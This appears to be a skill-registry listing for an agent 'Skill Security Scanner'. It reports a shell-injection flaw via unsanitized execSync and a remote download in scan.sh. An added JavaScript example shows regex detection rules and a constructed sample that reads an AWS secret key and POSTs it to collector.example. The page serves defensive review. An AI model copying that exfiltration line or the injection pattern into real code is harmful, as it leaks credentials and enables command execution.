torchesfrms

Skill Security Scanner

by moer · GitHub ↗ · v1.0.0 · MIT-0
cross-platform ⚠ suspicious
248
Downloads
0
Stars
0
Active Installs
1
Versions
Install in OpenClaw
/install skill-sec-scan-en
Description
Automatically detects security risks such as data exfiltration, injection, code obfuscation, and trojans/backdoors in JavaScript, TypeScript, Python, and Shell files, and generates a detailed report.
Usage Guidance
This skill appears internally consistent with its stated purpose (a static security scanner). Before running it:
  1. Review scripts/scan.sh and scan-all.sh to confirm how they handle remote URLs (cloning/downloading) and whether they execute any network commands.
  2. Run the scanner in a sandboxed environment or VM, and do not run it as root.
  3. If you intend to scan your installed skills, consider copying the skills directory to a safe location first and scanning the copy.
  4. Detection is regex-based, so expect false positives and false negatives; manually inspect every reported finding.
  5. The skill creates and reads whitelist.txt in its own directory and executes its scripts locally via child_process.execSync. That is normal for a scanner, but it means the skill can perform any side-effecting action your account permits.
If you are unsure about allowing shell/script execution or network access, inspect the shell scripts line by line or run them in an isolated container before using them with real repositories or sensitive directories.
Capability Analysis
Type: OpenClaw Skill
Name: skill-sec-scan-en
Version: 1.0.0
The skill is a security scanner designed to perform static analysis on other OpenClaw skills. Although its stated purpose is defensive, it contains a critical shell-injection vulnerability in `index.js`: user-supplied arguments are passed unsanitized to `child_process.execSync`, which hands them to a shell for parsing. In addition, `scripts/scan.sh` makes network requests to an external endpoint (`wry-manatee-359.convex.site`) to download and unzip remote content, a high-risk behavior for a security tool. Together these flaws allow arbitrary command execution if a user supplies a crafted skill name or URL.
Capability Assessment
Purpose & Capability
The name/description (security scanner for JS/TS/Python/Shell) matches the provided artifacts: a CLI wrapper (index.js), a Node scanner (node/scanner.js) implementing regex rules, and shell scripts (scripts/scan.sh, scan-all.sh). No unrelated environment variables, binaries, or cloud credentials are requested.
Instruction Scope
SKILL.md explicitly instructs the agent to run local scripts (./scripts/scan.sh, ./scripts/scan-all.sh) against local skill directories and remote URLs. That behavior is coherent for a scanner, but it means the skill will read arbitrary skill directories (e.g., ~/.openclaw/workspace/skills) and may fetch/inspect remote repos. The instructions give the agent permission to execute the included shell scripts (and the code does so via execSync), so the runtime has the ability to perform filesystem and network operations consistent with a scanner.
Install Mechanism
No install spec is declared (instruction-only at registry level), and the bundle includes local scripts and Node code that will be executed in-place. There are no downloads from untrusted URLs during an install step. This is appropriate for a script-based scanner, but note the skill executes those local scripts when invoked.
Credentials
The skill declares no required environment variables or credentials. The scanner's detection rules look for occurrences of cloud-related env vars inside target code (e.g., process.env.AWS_), which is expected for a security scanner and does not imply the skill needs those secrets itself.
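Because the scanner's rules are regular expressions over source text, a rule such as "mentions process.env.AWS_" fires on the benign and the malicious file alike. The following is an added example written for this page, not `node/scanner.js` from the skill: a minimal regex-rule engine with a 0 to 100 score and a whitelist, run over two constructed files so the false-positive behaviour the guidance warns about is visible. Rule ids, weights, thresholds, the whitelist entry format and both sample files are assumptions.

```javascript
// Added example (not the skill's scanner): regex rules with scoring and a
// whitelist. Rule set, weights, thresholds and samples are constructed.
const RULES = [
  { id: "exfil.cloud-env",   weight: 40, re: /process\.env\.(AWS_|AZURE_|GOOGLE_)[A-Z0-9_]*/ },
  { id: "exfil.network",     weight: 30, re: /\b(fetch|axios\.(get|post)|https?\.request)\s*\(/ },
  { id: "inject.exec",       weight: 40, re: /\bchild_process\b|\bexecSync\s*\(|\bexec\s*\(/ },
  { id: "obfus.eval-decode", weight: 50, re: /\beval\s*\(\s*(atob|Buffer\.from)\s*\(/ },
];

function riskLevel(score) {
  if (score >= 70) return "high";
  if (score >= 30) return "medium";
  return "low";
}

// whitelist entries are "<file>:<rule id>" strings (assumed format); a
// whitelisted finding is still reported but no longer counts toward the score
function scanSource(file, source, whitelist = new Set()) {
  const findings = [];
  source.split("\n").forEach((text, idx) => {
    for (const rule of RULES) {
      if (!rule.re.test(text)) continue;
      findings.push({
        file,
        line: idx + 1,
        rule: rule.id,
        weight: rule.weight,
        whitelisted: whitelist.has(`${file}:${rule.id}`),
        text: text.trim(),
      });
    }
  });
  const score = Math.min(
    100,
    findings.filter((f) => !f.whitelisted).reduce((sum, f) => sum + f.weight, 0),
  );
  return { file, score, level: riskLevel(score), findings };
}

// Constructed sample 1: credential read followed by an outbound POST.
const DROPPER_JS = [
  "const key = process.env.AWS_SECRET_ACCESS_KEY;",
  'fetch("https://collector.example/upload", { method: "POST", body: key });',
].join("\n");

// Constructed sample 2: a benign CI helper that trips the same two rules,
// once in a comment and once via a legitimate child_process import.
const CI_HELPER_JS = [
  "// Never echo process.env.AWS_SECRET_ACCESS_KEY into CI logs",
  'const { execFileSync } = require("node:child_process");',
  'const status = execFileSync("git", ["status", "--short"], { encoding: "utf8" });',
].join("\n");

function demo() {
  const dropper = scanSource("dropper.js", DROPPER_JS);
  const helperRaw = scanSource("ci-helper.js", CI_HELPER_JS);
  const helperWhitelisted = scanSource(
    "ci-helper.js",
    CI_HELPER_JS,
    new Set(["ci-helper.js:exfil.cloud-env", "ci-helper.js:inject.exec"]),
  );
  return { dropper, helperRaw, helperWhitelisted };
}
```

Both files come out "high" on the raw score; only a human reading the findings (or a reviewed whitelist entry) separates the dropper from the helper, which is exactly why the guidance says to inspect every reported finding rather than trust the number.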
Persistence & Privilege
always:false (normal). The skill does not request permanent system-wide presence and does not modify other skills' configurations in the provided files. It will create/read a local whitelist file inside its package and read user skill directories when run; autonomous invocation is allowed by default (normal) but not forced.
How to Use
  1. Make sure OpenClaw is installed (local or Docker)
  2. Run the install command in chat: /install skill-sec-scan-en
  3. After installation, invoke the skill by name or use /skill-sec-scan-en
  4. Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.0
Skill Security Scanner v1.0.0 — Initial Release
  - Introduces an enterprise-grade skill security scanner supporting JavaScript, TypeScript, Python, and Shell file types.
  - Detects four major threat categories: data exfiltration, injection attacks, code obfuscation, and trojans/backdoors.
  - Implements 57 detailed detection rules, covering 60+ dangerous operation patterns.
  - Features an intelligence-driven static analysis engine with quantitative scoring (0–100) and clear risk levels.
  - Supports remote (ClawHub/GitHub) and local scanning, batch operations, detailed risk reports, and user-defined whitelists.
  - Provides standard report templates, natural language triggers, and full documentation for usage and result interpretation.
Metadata
Slug skill-sec-scan-en
Version 1.0.0
License MIT-0
All-time Installs 0
Active Installs 0
Total Versions 1
Frequently Asked Questions

What is Skill Security Scanner?

Automatically detects security risks such as data exfiltration, injection, code obfuscation, and trojans/backdoors in JavaScript, TypeScript, Python, and Shell files, and generates a detailed report. It is an AI Agent Skill for Claude Code / OpenClaw, with 248 downloads so far.

How do I install Skill Security Scanner?

Run "/install skill-sec-scan-en" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.

Is Skill Security Scanner free?

Yes, Skill Security Scanner is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does Skill Security Scanner support?

Skill Security Scanner is cross-platform and runs anywhere OpenClaw / Claude Code is available.

Who created Skill Security Scanner?

It is built and maintained by moer (@torchesfrms); the current version is v1.0.0.
